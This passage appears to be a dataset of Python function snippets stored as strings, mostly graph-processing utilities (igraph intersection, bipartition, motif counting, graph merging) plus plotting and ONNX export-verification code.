y2=Yquantiles[1, :, 0], color='black', alpha=0.05)\r\n # axy.fill_between(x=Xnewx[:, 0], y1=Yprime_quantiles[0, :, 0], y2=Yprime_quantiles[1, :, 0], color='blue',alpha=0.05)\r\n # 
axz.fill_between(x=Xnewx[:, 0], y1=Zquantiles[0, :, 0], y2=Zquantiles[1, :, 0], color='black', alpha=0.05)\r\n # axz.fill_between(x=Xnewx[:, 0], y1=Zprime_quantiles[0, :, 0], y2=Zprime_quantiles[1, :, 0], color='blue',alpha=0.05)\r\n\r\n axx.fill_between(x=Xnewx[:, 0], y1=Xpred[:,0]-Xvar[:,0]**0.5, y2=Xpred[:,0]+Xvar[:,0]**0.5, color='black', alpha=0.05)\r\n axx.fill_between(x=Xnewx[:, 0], y1=Xpred_prime[:,0]-Xprime_var[:,0]**0.5, y2=Xpred_prime[:,0]+Xprime_var[:,0]**0.5, color='blue', alpha=0.05)\r\n axy.fill_between(x=Xnewx[:, 0], y1=Ypred[:,0]-Yvar[:,0]**0.5, y2=Ypred[:,0]+Yvar[:,0]**0.5, color='black', alpha=0.05)\r\n axy.fill_between(x=Xnewx[:, 0], y1=Ypred_prime[:,0]-Yprime_var[:,0]**0.5, y2=Ypred_prime[:,0]+Yprime_var[:,0]**0.5, color='blue', alpha=0.05)\r\n axz.fill_between(x=Xnewx[:, 0], y1=Zpred[:,0]-Zvar[:,0]**0.5, y2=Zpred[:,0]+Zvar[:,0]**0.5, color='black', alpha=0.05)\r\n axz.fill_between(x=Xnewx[:, 0], y1=Zpred_prime[:,0]-Zprime_var[:,0]**0.5, y2=Zpred_prime[:,0]+Zprime_var[:,0]**0.5, color='blue', alpha=0.05)\r\n\r\n # axx.plot(X2, Xpred, 'k--', alpha=0.5)\r\n # axx.plot(X2, Xpred_prime, 'b--', alpha=0.5)\r\n # axy.plot(X2, Ypred, 'k--', alpha=0.5)\r\n # axy.plot(X2, Ypred_prime, 'b--', alpha=0.5)\r\n # axz.plot(X2, Zpred, 'k--', alpha=0.5)\r\n # axz.plot(X2, Zpred_prime, 'b--', alpha=0.5)\r\n\r\n # axx.scatter(X2[:, 0], Y2[0, 0, :], color='k', marker='x', s=50*(72./fig.dpi)**2)\r\n # axx.scatter(X2[:, 0], Y2prime[0, 0, :], color='b', marker='x', s=50*(72./fig.dpi)**2)\r\n # axy.scatter(X2[:, 0], Y2[0, 1, :], color='k', marker='1', s=50*(72./fig.dpi)**2)\r\n # axy.scatter(X2[:, 0], Y2prime[0, 1, :], color='b', marker='1', s=50*(72./fig.dpi)**2)\r\n # axz.scatter(X2[:, 0], Y2[0, 2, :], color='k', marker='+', s=50*(72./fig.dpi)**2)\r\n # axz.scatter(X2[:, 0], Y2prime[0, 2, :], color='b', marker='+', s=50*(72./fig.dpi)**2)\r\n\r\n axx.plot(X2[:, 0], Y2[0, 0, :], color='k', linestyle=':', alpha=0.5) # , s=50*(72./fig.dpi)**2)\r\n axx.plot(X2[:, 0], Y2prime[0, 0, :], color='b', linestyle=':', alpha=0.5) # , s=50*(72./fig.dpi)**2)\r\n axy.plot(X2[:, 0], Y2[0, 1, :], color='k', linestyle='--', alpha=0.5) # , s=50*(72./fig.dpi)**2)\r\n axy.plot(X2[:, 0], Y2prime[0, 1, :], color='b', linestyle='--', alpha=0.5) # , s=50*(72./fig.dpi)**2)\r\n axz.plot(X2[:, 0], Y2[0, 2, :], color='k', linestyle='-.', alpha=0.5) # , s=50*(72./fig.dpi)**2)\r\n axz.plot(X2[:, 0], Y2prime[0, 2, :], color='b', linestyle='-.', alpha=0.5) # , s=50*(72./fig.dpi)**2)\r\n\r\n Xresiduals = (Y2[0, 0, :] - Xpred[:,0])/Xvar[:,0]**0.5\r\n Yresiduals = (Y2[0, 1, :] - Ypred[:,0])/Yvar[:,0]**0.5\r\n Zresiduals = (Y2[0, 2, :] - Zpred[:,0])/Zvar[:,0]**0.5\r\n # ax2.scatter(X2[:, 0], Xresiduals, color='k', marker='x', alpha=0.3)# , s=(72./fig.dpi)**2)\r\n # ax2.scatter(X2[:, 0], Yresiduals, color='k', marker='1', alpha=0.3)# , s=(72./fig.dpi)**2)\r\n # ax2.scatter(X2[:, 0], Zresiduals, color='k', marker='+', alpha=0.3)# , s=(72./fig.dpi)**2)\r\n ax2.plot(X2[:, 0], Xresiduals, color='k', linestyle=':', alpha=0.5) # , s=(72./fig.dpi)**2)\r\n ax2.plot(X2[:, 0], Yresiduals, color='k', linestyle='--', alpha=0.5) # , s=(72./fig.dpi)**2)\r\n ax2.plot(X2[:, 0], Zresiduals, color='k', linestyle='-.', alpha=0.5) # , s=(72./fig.dpi)**2)\r\n\r\n Xprime_residuals = (Y2prime[0, 0, :] - Xpred_prime[:, 0])/Xprime_var[:,0]**0.5\r\n Yprime_residuals = (Y2prime[0, 1, :] - Ypred_prime[:, 0])/Yprime_var[:,0]**0.5\r\n Zprime_residuals = (Y2prime[0, 2, :] - Zpred_prime[:, 0])/Zprime_var[:,0]**0.5\r\n # ax2.scatter(X2[:, 0], Xprime_residuals, 
color='b', marker='x', alpha=0.3) # , s=(72./fig.dpi)**2)\r\n # ax2.scatter(X2[:, 0], Yprime_residuals, color='b', marker='1', alpha=0.3) # , s=(72./fig.dpi)**2)\r\n # ax2.scatter(X2[:, 0], Zprime_residuals, color='b', marker='+', alpha=0.3) # , s=(72./fig.dpi)**2)\r\n ax2.plot(X2[:, 0], Xprime_residuals, color='b', linestyle=':', alpha=0.5) # , s=(72./fig.dpi)**2)\r\n ax2.plot(X2[:, 0], Yprime_residuals, color='b', linestyle='--', alpha=0.5) # , s=(72./fig.dpi)**2)\r\n ax2.plot(X2[:, 0], Zprime_residuals, color='b', linestyle='-.', alpha=0.5) # , s=(72./fig.dpi)**2)\r\n\r\n\r\n bad_Xresiduals = (Y2prime[0, 0, :] - Xpred[:, 0])/Xvar[:,0]**0.5\r\n bad_Yresiduals = (Y2prime[0, 1, :] - Ypred[:, 0])/Yvar[:,0]**0.5\r\n bad_Zresiduals = (Y2prime[0, 2, :] - Zpred[:, 0])/Zvar[:,0]**0.5\r\n # ax3.scatter(X2[:, 0], bad_Xresiduals, color='k', marker='x', alpha=0.3)# , s=(72./fig.dpi)**2)\r\n # ax3.scatter(X2[:, 0], bad_Yresiduals, color='k', marker='1', alpha=0.3)# , s=(72./fig.dpi)**2)\r\n # ax3.scatter(X2[:, 0], bad_Zresiduals, color='k', marker='+', alpha=0.3)# , s=(72./fig.dpi)**2)\r\n ax3.plot(X2[:, 0], bad_Xresiduals, color='k', linestyle=':', alpha=0.5)# , s=(72./fig.dpi)**2)\r\n ax3.plot(X2[:, 0], bad_Yresiduals, color='k', linestyle='--', alpha=0.5)# , s=(72./fig.dpi)**2)\r\n ax3.plot(X2[:, 0], bad_Zresiduals, color='k', linestyle='-.', alpha=0.5)# , s=(72./fig.dpi)**2)\r\n\r\n\r\n bad_Xprime_residuals = (Y2[0, 0, :] - Xpred_prime[:,0])/Xprime_var[:,0]**0.5\r\n bad_Yprime_residuals = (Y2[0, 1, :] - Ypred_prime[:,0])/Yprime_var[:,0]**0.5\r\n bad_Zprime_residuals = (Y2[0, 2, :] - Zpred_prime[:,0])/Zprime_var[:,0]**0.5\r\n # ax3.scatter(X2[:, 0], bad_Xprime_residuals, color='b', marker='x', alpha=0.3) # , s=(72./fig.dpi)**2)\r\n # ax3.scatter(X2[:, 0], bad_Yprime_residuals, color='b', marker='1', alpha=0.3) # , s=(72./fig.dpi)**2)\r\n # ax3.scatter(X2[:, 0], bad_Zprime_residuals, color='b', marker='+', alpha=0.3) # , s=(72./fig.dpi)**2)\r\n ax3.plot(X2[:, 0], bad_Xprime_residuals, color='b', linestyle=':', alpha=0.5) # , s=(72./fig.dpi)**2)\r\n ax3.plot(X2[:, 0], bad_Yprime_residuals, color='b', linestyle='--', alpha=0.5) # , s=(72./fig.dpi)**2)\r\n ax3.plot(X2[:, 0], bad_Zprime_residuals, color='b', linestyle='-.', alpha=0.5) # , s=(72./fig.dpi)**2)\r\n # ylabels = axz.get_yticklabels()\r\n # print(ylabels)\r\n\r\n # X2_list = [X2, X2, X2]\r\n #\r\n # print(GP3.log_predictive_density())\r\n return fig.show()",
"def intersect_igraphs(G1, G2):\n # Ginter = G1.__and__(G2) # This does not work with attributes.\n if G1.ecount() > G2.ecount(): # Iterate through edges of the smaller graph\n G1, G2 = G2, G1\n inter_nodes = set()\n inter_edges = []\n inter_edge_attributes = {}\n inter_node_attributes = {}\n edge_attribute_name_list = G2.edge_attributes()\n node_attribute_name_list = G2.vertex_attributes()\n for edge_attribute_name in edge_attribute_name_list:\n inter_edge_attributes[edge_attribute_name] = []\n for node_attribute_name in node_attribute_name_list:\n inter_node_attributes[node_attribute_name] = []\n for e in list(G1.es):\n n1_id = e.source_vertex[\"id\"]\n n2_id = e.target_vertex[\"id\"]\n try:\n n1_index = G2.vs.find(id = n1_id).index\n n2_index = G2.vs.find(id = n2_id).index\n except ValueError:\n continue\n if G2.are_connected(n1_index, n2_index):\n inter_edges.append((n1_index, n2_index))\n inter_nodes.add(n1_index)\n inter_nodes.add(n2_index)\n edge_attributes = e.attributes()\n for edge_attribute_name in edge_attribute_name_list:\n inter_edge_attributes[edge_attribute_name].append(edge_attributes[edge_attribute_name])\n\n # map nodeids to first len(inter_nodes) integers\n idmap = {n_index:i for n_index,i in zip(inter_nodes, range(len(inter_nodes)))}\n\n G_inter = ig.Graph()\n G_inter.add_vertices(len(inter_nodes))\n G_inter.add_edges([(idmap[e[0]], idmap[e[1]]) for e in inter_edges])\n for edge_attribute_name in edge_attribute_name_list:\n G_inter.es[edge_attribute_name] = inter_edge_attributes[edge_attribute_name]\n\n for n_index in idmap.keys():\n v = G2.vs[n_index]\n node_attributes = v.attributes()\n for node_attribute_name in node_attribute_name_list:\n inter_node_attributes[node_attribute_name].append(node_attributes[node_attribute_name])\n for node_attribute_name in node_attribute_name_list:\n G_inter.vs[node_attribute_name] = inter_node_attributes[node_attribute_name]\n\n return G_inter",
"def haveNoSameEdges(seg1,seg2,segmentsMeta):\n seg1Edges = segmentsMeta['edges'][seg1]\n seg2Edges = segmentsMeta['edges'][seg2]\n return not any(a==b for a in seg1Edges for b in seg2Edges)",
"def get_bipartition(g):\n # Write your code here.\n colorArr = [-1] * (len(g.nodes()) + 1)\n for node in g.nodes():\n start = g.neighbors(node)\n if len(start)>0:\n src = start.pop()\n break\n colorArr[src] = 1\n queue = []\n queue.append(src)\n while (queue):\n u = queue.pop()\n for v in g.nodes():\n if g.has_edge(u, v) and colorArr[v] == -1:\n colorArr[v] = 1 - colorArr[u]\n queue.append(v)\n elif g.has_edge(u, v) and colorArr[u] == colorArr[v]:\n return None\n\n red = set()\n for i in range(1, len(colorArr)):\n if colorArr[i] == 1:\n red.add(i)\n return list(red)\n\n\n\n # Hint! If you'd like to test out these commands without\n # writing a full-fledged program, you might want to familiarise\n # yourself with the Python interactive shell or IPython (available\n # on at least some Aalto IT computers)\n\n # Create a simple line graph g: \"(1)->(2)->(3)\"\n # (The creation parameter is a dict of {node: list_of_neighbors},\n # but this is not something you will be needing in your code.)\n # >>> from networkx import Graph \n # >>> g = Graph({1: [2], 2: [3]})\n # >>> g.number_of_nodes()\n # 3\n\n # Example. Iterate over the nodes and mark them as visited\n # >>> visited = set()\n # >>> for node in g.nodes_iter(): # There is also g.nodes(), which returns a list\n # ... # do some work here\n # ... visited.add(node)\n \n # Example. Given a Node v, get all nodes s.t. there is an edge between\n # v and that node\n # >>> g.neighbors(1)\n # [2]\n\n # Example. Get the edges of the graph:\n # >>> e.edges() # as with nodes, there is also g.edges_iter()\n # [(1, 2), (2, 3)]\n\n # For more information, consult the NetworkX documentation:\n # https://networkx.github.io/documentation/networkx-1.10/tutorial/tutorial.html",
"def find_structure(self):\n cave_graphs = []\n starting_point = None\n # firse initalize points\n for point in self.points.values():\n neighbors = self.get_neighbors(point)\n if len(neighbors) != 2 and point.node is None:\n starting_point = point\n print 'Found graph!'\n cave_graphs.append(self.follow_graph(starting_point))\n \n if starting_point is None:\n raise Exception(\"Couldn't detect any junction in the thinned map.\")\n \n return cave_graphs",
"def _split_seen_unseen_new(dfs, name_train, name_test):\n\n def _table_is_composed_of(composed_table, tables):\n return set(composed_table.name.split()).intersection(tables)\n\n seen = [t for t in dfs if not _table_is_composed_of(t, name_test)]\n new = [t for t in dfs if not _table_is_composed_of(t, name_train)]\n unseen = [t for t in dfs if _table_is_composed_of(t, name_test) and _table_is_composed_of(t, name_train)]\n return seen, unseen, new",
"def connect_all(graph, nodeset):\n for element in nodeset:\n graph.add_node(element)\n for element1 in nodeset:\n for element2 in nodeset:\n if not element1 == element2:\n graph.add_edge(element1, element2)\n return graph",
"def detect_splits(self):\n logg.info(' abstracted graph will have {} nodes'.format(self.n_splits+1))\n indices_all = np.arange(self.X.shape[0], dtype=int)\n segs = [indices_all]\n if False: # this is safe, but not compatible with on-the-fly computation\n tips_all = np.array(np.unravel_index(np.argmax(self.Dchosen), self.Dchosen.shape))\n else:\n if self.iroot is not None:\n tip_0 = np.argmax(self.Dchosen[self.iroot])\n else:\n tip_0 = np.argmax(self.Dchosen[0]) # just a random index, here fixed to \"0\"\n tips_all = np.array([tip_0, np.argmax(self.Dchosen[tip_0])])\n # we keep a list of the tips of each segment\n segs_tips = [tips_all]\n if self.clusters_precomputed_names:\n self.segs_names_original = [', '.join(self.clusters_precomputed_names)]\n segs_undecided = [True]\n segs_adjacency = [[]]\n segs_distances = np.zeros((1, 1))\n segs_adjacency_nodes = [{}]\n # logg.info(' do not consider groups with less than {} points for splitting'\n # .format(self.min_group_size))\n for ibranch in range(self.n_splits):\n if self.clusters == 'unconstrained_segments':\n iseg, new_tips = self.select_segment(segs, segs_tips, segs_undecided)\n if iseg == -1:\n logg.info('... partitioning converged')\n break\n logg.info('... branching {}:'.format(ibranch + 1),\n 'split group', iseg)\n segs_distances = self.do_split(segs, segs_tips,\n segs_undecided,\n segs_adjacency,\n segs_distances,\n iseg, new_tips)\n else:\n logg.msg(' split', ibranch + 1, v=4)\n stop, segs_distances = self.do_split_constrained(segs, segs_tips,\n segs_adjacency,\n segs_adjacency_nodes,\n segs_distances)\n if stop: break\n\n # segments\n self.segs = segs\n self.segs_tips = segs_tips\n self.segs_sizes = []\n for iseg, seg in enumerate(self.segs): self.segs_sizes.append(len(seg))\n\n # the full, unscaled adjacency matrix\n self.segs_adjacency_full_attachedness = 1/segs_distances\n # if self.attachedness_measure == 'connectedness':\n # norm = np.sqrt(np.multiply.outer(self.segs_sizes, self.segs_sizes))\n # self.segs_adjacency_full_attachedness /= norm\n self.segs_adjacency_full_confidence, self.segs_adjacency_tree_confidence \\\n = self.compute_adjacency_confidence(\n self.segs_adjacency_full_attachedness,\n segs_adjacency,\n self.tree_based_confidence)\n np.fill_diagonal(self.segs_adjacency_full_attachedness, 0)",
"def merge(self, g1, g2):\n logger = logging.getLogger(__name__)\n \n \n g = BaseGraph()\n g.copy_graph_from(g1)\n\n plwn2sumo_dict = defaultdict(set)\n plwn2sumo_dict = self.get_plwn2sumo_dict()\n\n synset_on_vertex_dict = {}\n for node in g.all_nodes():\n synset_id = node.synset.synset_id\n if synset_id in synset_on_vertex_dict:\n logger.warning(\"ID of some synset is not unique.\")\n continue\n synset_on_vertex_dict[synset_id] = node\n\n num_of_edge = 0\n for edge in g2.all_edges():\n num_of_edge += 1\n logger.info(\"%d/%d\", num_of_edge, g2.num_edges())\n\n parent_sumo_concept = edge.source().sumo\n child_sumo_concept = edge.target().sumo\n\n if parent_sumo_concept not in plwn2sumo_dict:\n logger.warning(\"The mapping file doesn't contain sumo concept '%s'.\", parent_sumo_concept)\n continue\n if child_sumo_concept not in plwn2sumo_dict:\n logger.warning(\"The mapping file doesn't contain sumo concept '%s'.\", child_sumo_concept)\n continue\n\n for parent_syn_id in plwn2sumo_dict[parent_sumo_concept]:\n if parent_syn_id not in synset_on_vertex_dict:\n logger.warning(\"The mapping file contains synset '%d' that is not in the graph.\", parent_syn_id)\n continue\n p_node = synset_on_vertex_dict[parent_syn_id]\n for child_syn_id in plwn2sumo_dict[child_sumo_concept]:\n if child_syn_id not in synset_on_vertex_dict:\n logger.warning(\"The mapping file contains synset '%d' that is not in the graph.\", child_syn_id)\n continue\n ch_node = synset_on_vertex_dict[child_syn_id]\n \n g.add_edge(p_node,\n ch_node,\n [(\"rel\", edge.rel)],\n simply=True)\n \n\n return g",
"def check_Motifs(H, m):\n\t#This function will take each possible subgraphs of gr of size 3, then\n\t#compare them to the mo dict using .subgraph() and is_isomorphic\n\t\n\t#This line simply creates a dictionary with 0 for all values, and the\n\t#motif names as keys\n\n\t##paper source \"Higher-order organization ofcomplex networks\" (2016) Benson et al, Science\n\t## I choose only the unidirection ones : M1, M5, M8, M9, M10\n\n\n\ts = int(m)\n\n\tif (s==3):\n\t\t#motifs = {'M1': nx.DiGraph([(1,2),(2,3),(3,1)]), 'M5': nx.DiGraph([(1,2),(2,3),(1,3)]), 'M8': nx.DiGraph([(2, 1),(2,3)]), 'M9': nx.DiGraph([(2, 1),(3, 2)]), 'M10': nx.DiGraph([(1,2),(3,2)])}\n\t\tmotifs = {'M1': [(1,2),(2,3),(3,1)], 'M5': [(1,2),(2,3),(1,3)], 'M8': [(2, 1),(2,3)], 'M9': [(2, 1),(3, 2)], 'M10': [(1,2),(3,2)],\n\t\t\t\t\t'M2': [(1,2),(2,3),(3,2),(3,1)], 'M3': [(1,2),(2,3),(3,2),(1,3),(3,1)], 'M4': [(1,2),(2,1),(2,3),(3,2),(1,3),(3,1)], 'M6': [(2, 1),(2,3),(1,3),(3,1)], 'M7': [(1,2),(3,2),(1,3),(3,1)],\n\t\t\t\t\t'M11': [(1,2),(2,1),(2,3)], 'M12': [(1,2),(2,1),(3,2)], 'M13': [(1,2),(2,1),(2,3),(3,2)]}\n\n\telif (s==4): ## under development\n\t\tmotifs = {'bifan': [(1,2),(1,3),(4,2),(4,3)]}\n\n\t\t#edgeLists=[[[1,2],[1,3],[1,4]]]\n\t\t#edgeLists.append([[1,2],[1,3],[1,4],[2,3]])\n\t\t#edgeLists.append([[1,2],[1,3],[1,4],[2,3],[3,4]])\n\t\t#edgeLists.append([[1,2],[1,3],[1,4],[2,3],[3,4],[2,4]])\n\telse:\n\t\traise nx.NetworkXNotImplemented('Size of motif must be 3 or 4')\n\n\t#outf = open(f2, 'w')\n\t#print >> outf, 'commitid|motiflabel|count'\n\n\tG = H\n\n\tmcount = dict(zip(motifs.keys(), list(map(int, np.zeros(len(motifs))))))\n\n\t## match the pattern and count the motifs \n\tdict_edges = defaultdict(list); dict_nodes = defaultdict(list)\n\tfor key in motifs :\n\t\n\t\t\tpattern = motifs[key]\n\t\t\n\t\t\tgmoti = nx.DiGraph()\n\t\t\tgmoti.add_edges_from(pattern)\n\n\t\t\tmotif_pattern_obs = subgraph_pattern(G, gmoti, sign_sensitive=False)\n\n\t\t\ts = []\n\t\t\tfor subgraph in motif_pattern_obs :\n\t\t\t\ttup = tuple(subgraph.keys())\n\t\t\t\ts.append(tup)\n\n\t\t\tuniqs = list(set(s))\n\n\t\t\tif len(uniqs) > 0 :\n\t\t\t\tmaplist = map(list, uniqs)\n\n\t\t\t### label the edges as per the motif labels\n\t\t\t\tmcount[str(key)] = len(maplist)\n\n\t\t\t\tfor triplets in maplist :\n\t\t\t\t\tsubgraph = G.subgraph(triplets)\n\t\t\t\t\tedgeLists = [e for e in subgraph.edges() if G.has_edge(*e)]\n\n\t\t\t\t## an edge is part of multiple motifs\n\t\t\t\t## lets count the number of motifs an edge is part of \n\t\t\t\t\tfor u, v in edgeLists :\n\t\t\t\t\t\tdict_edges[(u, v)].append(str(key))\n\t\n\n\t\t\t\t## A node is also part of multiple motifs. \n\t\t\t\t## We count the total number of motifs a node is part of\n\t\t\t\t## We count the frequency of occurence each motif the node is part of\n\t\t\t\t\tnodelists = subgraph.nodes()\n\t\t\t\t\tfor n in nodelists :\n\t\t\t\t\t\tdict_nodes[str(n)].append(str(key))\n\n\n\n\t\t#for keys, values in mcount.items() :\n\t\t#\tprint >> outf, '%s|%s|%s' %(outname, keys, values) \n\n\t### Let's mark the edge with motif type and count. We count the number of types\n\t### of motif an edge is a part of. An edge could appear in M1: M1x times and in M2: M2x times and so on\n\n\tfor u,v in G.edges() :\n\t\t\tif (u,v) in dict_edges :\n\t\t\t\tG[u][v]['num_motif_edge'] = len(list(set(dict_edges[(u,v)])))\n\n\t### Let's mark the node with motif type and count. We count the number of types of motif a node is a part of. 
\n\n\tfor n in G.nodes() :\n\t\tmotficountnode = dict(zip(motifs.keys(), list(map(int, np.zeros(len(motifs))))))\n\n\t\tif str(n) in dict_nodes :\n\t\t\tsubgraphnodeslist = dict_nodes[str(n)]\n\n\t\t\tfor key in subgraphnodeslist:\n\t\t\t\tmotficountnode[str(key)] +=1\n\n\t\tfor motif, count in motficountnode.items() :\n\t\t\tG.node[n][str(motif)] = int(count)\n\n\t### Let's mark the edge with motif type and count. We count the number of types\n\t### of motif an edge is a part of. An edge could appear in M1: M1x times and in M2: M2x times and so on\n\n\tfor u,v in G.edges() :\n\t\tmotficountedge = dict(zip(motifs.keys(), list(map(int, np.zeros(len(motifs))))))\n\n\t\tif (u,v) in dict_edges :\n\t\t\tsubgraphedgeslist = dict_edges[(u,v)]\n\n\t\t\tfor key in subgraphedgeslist:\n\t\t\t\tmotficountedge[str(key)] +=1\n\n\t\tfor motif, count in motficountedge.items() :\n\t\t\tG[u][v][str(motif)] = int(count)\n\n\n\treturn G",
"def GraphBetter(metric_set1_sorted, metric_set2_sorted, base_is_set_2):\n total_bitrate_difference_ratio = 0.0\n count = 0\n for bitrate, metric in metric_set1_sorted:\n for i in range(len(metric_set2_sorted) - 1):\n s2_bitrate_0, s2_metric_0 = metric_set2_sorted[i]\n s2_bitrate_1, s2_metric_1 = metric_set2_sorted[i + 1]\n # We have a point on either side of our metric range.\n if metric > s2_metric_0 and metric <= s2_metric_1:\n\n # Calculate a slope.\n if s2_metric_1 - s2_metric_0 != 0:\n metric_slope = ((s2_bitrate_1 - s2_bitrate_0) /\n (s2_metric_1 - s2_metric_0))\n else:\n metric_slope = 0\n\n estimated_s2_bitrate = (s2_bitrate_0 + (metric - s2_metric_0) *\n metric_slope)\n\n # Calculate percentage difference as given by base.\n if base_is_set_2 == 0:\n bitrate_difference_ratio = ((bitrate - estimated_s2_bitrate) /\n bitrate)\n else:\n bitrate_difference_ratio = ((bitrate - estimated_s2_bitrate) /\n estimated_s2_bitrate)\n\n total_bitrate_difference_ratio += bitrate_difference_ratio\n count += 1\n break\n\n # Calculate the average improvement between graphs.\n if count != 0:\n avg = total_bitrate_difference_ratio / count\n\n else:\n avg = 0.0\n\n return avg",
"def copy_graph(graph):\r\n new_graph = {}\r\n for node in graph:\r\n new_graph[node] = set(graph[node])\r\n return new_graph",
"def copy_graph(graph):\r\n new_graph = {}\r\n for node in graph:\r\n new_graph[node] = set(graph[node])\r\n return new_graph",
"def all_mismatch_leaf_graph_info(self) -> List[\"GraphInfo\"]:\n if not self.has_mismatch():\n return []\n\n no_mismatch_children = (\n self.upper_graph_info is None or not self.upper_graph_info.has_mismatch()\n ) and (\n self.lower_graph_info is None or not self.lower_graph_info.has_mismatch()\n )\n\n if no_mismatch_children:\n return [self]\n\n results = []\n if self.upper_graph_info is not None:\n results += self.upper_graph_info.all_mismatch_leaf_graph_info()\n if self.lower_graph_info is not None:\n results += self.lower_graph_info.all_mismatch_leaf_graph_info()\n\n return results",
"def __filterEdges(self):",
"def aga_compare_paths(adata1, adata2,\n adjacency_key='aga_adjacency_full_confidence'):\n import networkx as nx\n g1 = nx.Graph(adata1.add[adjacency_key])\n g2 = nx.Graph(adata2.add[adjacency_key])\n leaf_nodes1 = [str(x) for x in g1.nodes() if g1.degree(x) == 1]\n logg.msg('leaf nodes in graph 1: {}'.format(leaf_nodes1), v=5, no_indent=True)\n asso_groups1 = utils.identify_groups(adata1.smp['aga_groups'], adata2.smp['aga_groups'])\n asso_groups2 = utils.identify_groups(adata2.smp['aga_groups'], adata1.smp['aga_groups'])\n orig_names1 = adata1.add['aga_groups_order_original']\n orig_names2 = adata2.add['aga_groups_order_original']\n\n import itertools\n n_steps = 0\n n_agreeing_steps = 0\n n_paths = 0\n n_agreeing_paths = 0\n # loop over all pairs of leaf nodes in the reference adata1\n for (r, s) in itertools.combinations(leaf_nodes1, r=2):\n r2, s2 = asso_groups1[r][0], asso_groups1[s][0]\n orig_names = [orig_names1[int(i)] for i in [r, s]]\n orig_names += [orig_names2[int(i)] for i in [r2, s2]]\n logg.msg('compare shortest paths between leafs ({}, {}) in graph1 and ({}, {}) in graph2:'\n .format(*orig_names), v=4, no_indent=True)\n no_path1 = False\n try:\n path1 = [str(x) for x in nx.shortest_path(g1, int(r), int(s))]\n except nx.NetworkXNoPath:\n no_path1 = True\n no_path2 = False\n try:\n path2 = [str(x) for x in nx.shortest_path(g2, int(r2), int(s2))]\n except nx.NetworkXNoPath:\n no_path2 = True\n if no_path1 and no_path2:\n # consistent behavior\n n_paths += 1\n n_agreeing_paths += 1\n n_steps += 1\n n_agreeing_steps += 1\n continue\n elif no_path1 or no_path2:\n # non-consistent result\n n_paths += 1\n n_steps += 1\n continue\n if len(path1) >= len(path2):\n path_mapped = [asso_groups1[l] for l in path1]\n path_compare = path2\n path_compare_id = 2\n path_compare_orig_names = [[orig_names2[int(s)] for s in l] for l in path_compare]\n path_mapped_orig_names = [[orig_names2[int(s)] for s in l] for l in path_mapped]\n else:\n path_mapped = [asso_groups2[l] for l in path2]\n path_compare = path1\n path_compare_id = 1\n path_compare_orig_names = [[orig_names1[int(s)] for s in l] for l in path_compare]\n path_mapped_orig_names = [[orig_names1[int(s)] for s in l] for l in path_mapped]\n n_agreeing_steps_path = 0\n ip_progress = 0\n for il, l in enumerate(path_compare[:-1]):\n for ip, p in enumerate(path_mapped):\n if ip >= ip_progress and l in p:\n # check whether we can find the step forward of path_compare in path_mapped\n if (ip + 1 < len(path_mapped)\n and\n path_compare[il + 1] in path_mapped[ip + 1]):\n # make sure that a step backward leads us to the same value of l\n # in case we \"jumped\"\n logg.msg('found matching step ({} -> {}) at position {} in path{} and position {} in path_mapped'\n .format(l, path_compare_orig_names[il + 1], il, path_compare_id, ip), v=6)\n consistent_history = True\n for iip in range(ip, ip_progress, -1):\n if l not in path_mapped[iip - 1]:\n consistent_history = False\n if consistent_history:\n # here, we take one step further back (ip_progress - 1); it's implied that this\n # was ok in the previous step\n logg.msg(' step(s) backward to position(s) {} in path_mapped are fine, too: valid step'\n .format(list(range(ip - 1, ip_progress - 2, -1))), v=6)\n n_agreeing_steps_path += 1\n ip_progress = ip + 1\n break\n n_steps_path = len(path_compare) - 1\n n_agreeing_steps += n_agreeing_steps_path\n n_steps += n_steps_path\n n_paths += 1\n if n_agreeing_steps_path == n_steps_path: n_agreeing_paths += 1\n\n # only for the output, use original names\n 
path1_orig_names = [orig_names1[int(s)] for s in path1]\n path2_orig_names = [orig_names2[int(s)] for s in path2]\n logg.msg(' path1 = {},\\n'\n 'path_mapped = {},\\n'\n ' path2 = {},\\n'\n '-> n_agreeing_steps = {} / n_steps = {}.'\n .format(path1_orig_names,\n [list(p) for p in path_mapped_orig_names],\n path2_orig_names,\n n_agreeing_steps_path, n_steps_path), v=5, no_indent=True)\n Result = namedtuple('aga_compare_paths_result',\n ['frac_steps', 'n_steps', 'frac_paths', 'n_paths'])\n return Result(frac_steps=n_agreeing_steps/n_steps if n_steps > 0 else np.nan,\n n_steps=n_steps if n_steps > 0 else np.nan,\n frac_paths=n_agreeing_paths/n_paths if n_steps > 0 else np.nan,\n n_paths=n_paths if n_steps > 0 else np.nan)",
"def find_mismatch(\n self,\n options: Optional[VerificationOptions] = None,\n ):\n self.clear()\n\n if options is None:\n options = VerificationOptions()\n\n if self.export_options.verbose:\n print(self.graph)\n\n if len(list(self.graph.outputs())) == 0:\n return\n\n assert len(self.input_args) + len(self.params_dict) == len(\n list(self.graph.inputs())\n ), (\n f\"Number of graph inputs({len(list(self.graph.inputs()))}) does not match \"\n f\"the provided tensor arguments({len(self.input_args)} + {len(self.params_dict)}).\"\n )\n\n self.mismatch_error, self._onnx_graph, self.pt_outs, _ = self.verify_export(\n options\n )\n\n if self.mismatch_error is None:\n # No mismatch found in graph.\n return\n\n if self.essential_node_count() <= 1:\n # Reached leaf node, no more partitioning.\n return\n\n full_kwargs = {\n k.debugName(): v for k, v in zip(self.graph.inputs(), self.input_args)\n }\n full_params = self.params_dict\n\n upper_graph = self._partition_upper_graph()\n upper_args, upper_params = self._args_and_params_for_partition_graph(\n upper_graph, {}, full_kwargs, full_params\n )\n self.upper_graph_info = GraphInfo(\n upper_graph,\n upper_args,\n upper_params,\n self.export_options,\n id=self.id + \"0\",\n )\n\n self.upper_graph_info.find_mismatch(options)\n\n bridge_kwargs = self.upper_graph_info._bridge_kwargs()\n lower_graph = self._partition_lower_graph()\n lower_args, lower_params = self._args_and_params_for_partition_graph(\n lower_graph, bridge_kwargs, full_kwargs, full_params\n )\n self.lower_graph_info = GraphInfo(\n lower_graph,\n lower_args,\n lower_params,\n self.export_options,\n id=self.id + \"1\",\n )\n\n self.lower_graph_info.find_mismatch(options)",
"def _build_graph2(self, g1):\n g2 = g1.copy()\n for source, target, weight in self._remaining_edges:\n if weight == -1:\n self._gt_edges.append((source, target))\n if g2.has_edge(source, target):\n g2.remove_edge(source, target)\n return g2",
"def sub_graph_merging(self):\n raise NotImplementedError()",
